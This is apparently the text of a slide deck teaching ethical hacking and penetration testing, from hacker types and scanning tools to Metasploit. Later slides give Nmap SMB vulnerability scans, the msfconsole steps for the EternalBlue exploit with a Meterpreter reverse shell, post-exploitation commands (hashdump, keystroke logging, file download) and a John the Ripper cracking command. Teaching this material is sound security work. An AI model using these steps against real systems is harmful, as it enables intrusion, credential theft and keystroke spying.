  • 4. Types of Hackers  White Hat  IT professional  Administrators  Black Hat  Crackers  Grey Hat
  • 5. Understanding the need to hack your own system  Basis for Ethical Hacking.  To catch a thief, think like a thief
  • 6. Overall goals of an ethical hacker  Hack your systems in a nondestructive fashion.  Enumerate vulnerabilities and , if necessary, prove to management that vulnerabilities exit and can be exploited.  Apply result to remove the vulnerabilities and better secure your systems.
  • 7. Vulnerability Assessment  A vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.
  • 8. Vulnerability Assessment Tools  Nexpose Community  QualysGuard  OpenVAS  Nikto  Nmap  Nessus Professional  Acunetix  Netsparker  IBM AppScan  Burp Suite
  • 9. What is Penetration Testing  A penetration test, also known as a pen test, is a simulated cyber attack against your network, infrastructure, devices, computer system or any other environment to check for exploitable vulnerabilities.
  • 10. Types of Penetration Tests  Black Box Penetration Testing  White Box Penetration Testing  Grey Box Penetration Testing
  • 11. Black Box Penetration Testing  In black box penetration testing, tester has no idea about the systems that he is going to test. He is interested to gather information about the target network or system. For example, in this testing, a tester only knows what should be the expected outcome and he does not know how the outcomes arrives. He does not examine any programming codes.
  • 12. White Box Penetration Testing  This is a comprehensive testing, as tester has been provided with whole range of information about the systems and/or network such as Schema, Source code, OS details, IP address, etc. It is normally considered as a simulation of an attack by an internal source. It is also known as structural, glass box, clear box, and open box testing.  White box penetration testing examines the code coverage and does data flow testing, path testing, loop testing, etc.
  • 13. Grey Box Penetration Testing  In this type of testing, a tester usually provides partial or limited information about the internal details of the program of a system. It can be considered as an attack by an external hacker who had gained illegitimate access to an organization's network infrastructure documents.
  • 15. Top 10 Common Vulnerabilities  SQL Injection  Cross Site Scripting  Broken Authentication and Session Management  Insecure Direct Object References  Cross Site Request Forgery  Security Misconfiguration  Insecure Cryptographic Storage  Failure to restrict URL Access  Insufficient Transport Layer Protection  Un-validated Redirects and Forwards
  • 16. Demo Website and VMs  https://demo.testfire.net  http://testphp.vulnweb.com  OWASP Mutillidae II  Attack-defense online lab
  • 17.
  • 18. Building Hacking Environment  Kali Linux - http://www.kali.org/downloads/
  • 20. Ports Scanning With NMAP  nmap –sS -T4 –v <target>
  • 21. Foot-printing Services With NMAP  nmap –sS –sV -T4 –v <target>
  • 22. Vulnerability Scanning With NMAP  nmap -sS -sV -p 445 -T4 -v --script smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06- 025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln- ms17-010 192.168.10.135
  • 23. Web Vulnerability Scanning  OWASP ZAP – zaproxy
  • 24. Starting with Metasploit !!!  The Metasploit project is an open-source, computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development.  Metasploit is an framework which is used for the hacking of different kinds of applications, operating systems, web applications etc.
  • 25. What is metasploit ?  Metasploit contain various exploits, payloads, modules etc.  Metasploit Framework is especially used by many of the hackers to generate payloads and attack the systems.  As Metasploit is an open source where any one can use it. This framework supports different operating systems like windows, linux ,mac os x etc.
  • 26. Metasploit terms  Exploit  used to take advantage of a security flaw within a system, network, or application.  Payload  is code that our victim computer to execute by the Metasploit framework.  Module  a small piece of code that can be added to the Metasploit framework to execute an attack.  Shell-code  a small piece of code used as a payload.
  • 27. What is a vulnerability?  A vulnerability is a security hole in a piece of software, hardware or operating system that provides a potential angle to attack the system.  A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.
  • 28. What is an exploit?  To take advantage of a vulnerability, you often need an exploit, a small and highly specialized computer program whose only reason of being is to take advantage of a specific vulnerability and to provide access to a computer system.  Exploits often deliver a payload to the target system to grant the attacker access to the system.
  • 29. What is a payload?  A payload is the piece of software that lets you control a computer system after it’s been exploited.  The payload is typically attached to and delivered by the exploit.  Metasploit most popular payload is called Meterpreter, which enables you to do all sorts of funky stuff on the target system. For example, you can upload and download files from the system, take screenshots, and collect password hashes etc.
  • 30. What is msfconsole ?  MSFconsole is an all-in-one interface to most of the features in Metasploit.  MSFconsole can be used to launch attacks, creating listeners, and much, much more.  Commands :  Show exploits  Show payloads  Show options  Use exploit
  • 31. Commands  set payload  Set LHOST  Set RHOST  Back  Info  Session  Session –l  Session –i 1
  • 32. Meterpreter commands  Getuid -> show uid  Ps -> show active process  Migrate -> command used when hacker want to migrate his process to any administrative privileges process.  Hashdump -> to dump password hash.  Screenshot -> to take screenshot of victim.  Shell -> to enter into the victim shell.  download C:<file name>  upload C:<file name>
  • 33. More Meterpreter commands  keyscan_start -> start sniffing key strokes.  keyscan_dump  keyscan_stop  uictl disable keyboard  uictl enable keyboard
  • 34. Demonstration - Service Exploitation
  • 35. Reconnaissance  Ports and service scan of target system >> nmap -sS -p445 -sV -v <victim_IP>
  • 36. Exploitation – ms17_010_eternalblue >> msfconsole msf5 > use exploit/windows/smb/ms17_010_eternalblue msf > set payload windows/x64/meterpreter/reverse_tcp
  • 37. msf5 > show options msf5 > set RHOST <victim_IP> Exploitation – ms17_010_eternalblue
  • 39.
  • 40. Windows Password Cracking  John the ripper  Command : John –format=LM –wordlist= /usr/share/commix/src/txt/password_john.txt hash.txt